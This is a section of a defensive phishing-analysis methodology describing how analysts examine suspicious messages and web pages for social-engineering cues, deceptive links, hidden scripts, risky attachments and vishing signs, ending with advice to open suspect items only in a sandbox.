Phase 4: Analyze the Content

The purpose of this phase is to critically inspect the contents of the message or phishing asset (email, SMS, voicemail transcript, social media message, or webpage) for:

• Signs of social engineering

• Technical indicators of compromise (IOCs)

• Malicious intent, such as credential theft or malware delivery

At this phase, analysts look to connect context to motive, beyond the “how” a message was sent, and investigate why it was sent and what it wants the target to do.

Key Areas of Content Analysis

1. Message Analysis (Social Engineering Detection)

   • Analyze both written language and visual structure; compare suspicious emails to known-good examples from the same organization or platform (if possible). Search for:

     • Spelling/Grammar -  Errors, non-native syntax, typos, inconsistent capitalization

     • Formatting - Misaligned elements, odd font choices, broken layout, wrong date/time zone

     • Generic Greetings - “Dear Customer,” “Hello user,” or no greeting

     • Awkward Phrasing - Phrases like “kindly do the needful” or “your services will expire before 24hrs”

     • Logo/Brand Abuse - Poorly rendered logos, outdated branding, low-res images

     • Imitation Attempts - Signature blocks that impersonate trusted entities but are off slightly (wrong titles, domains, or contact info)

   • Search for psychological manipulation within the content (trying to get victims to act without thinking) - urgency, fear, authority, scarcity, curiosity, and greed.

2. Technical Indicators of Compromise (IOCs)

   • URLs and hyperlinks are core payloads in phishing attempts, thus, attackers may obfuscate URLs, hide malicious domains behind redirects, or use deceptive domains. Search for:

     • Hover over the link (do not click); is the display text different from the actual URL?

     • Are shortened URLs (e.g., bit.ly, tinyurl) used?

     • Are there embedded login forms or tracking links?

     • Are domains misspelled or unusual - typosquatting or homographs?

   • Email/web attacks often employ advanced phishing techniques to obfuscate or hide code to mask intent. Analysts should search for:

     • Base64 or Quoted-Printable Encoding - hides payloads in attachments or HTML

     • Hidden Form Fields - collects data without user consent

     • JavaScript - redirects, keyloggers, form submissions to external domains

     • Embedded IFrames - load external pages or phishing forms silently

     • Tracking Pixels - invisible images used to track if a user opened the message

   • Attachments are mainly associated with emails, and attackers can use these to steal sensitive data, launch a second attack stage, or compromise and gain remote access. Search for:

     • Does the filename align with the message content?

     • Is the extension suspicious (.exe, .vbs, .js, .iso, .hta, .xlsm, etc.)?

     • Is there a lure message urging you to open it?

     • Does it ask you to “Enable Macros” or “Click to View”?

   • Texted-based messages can follow the same content analysis as emails, web, or URLs. However, voice (vishing) analysis will review the following:

     • Is the tone threatening or overly helpful?

     • Does the caller request sensitive info?

     • Is the callback number consistent with the supposed organization?

   • For suspicious URLs, hyperlinks, payloads, websites, or attachments, execute or access them within a secure sandbox.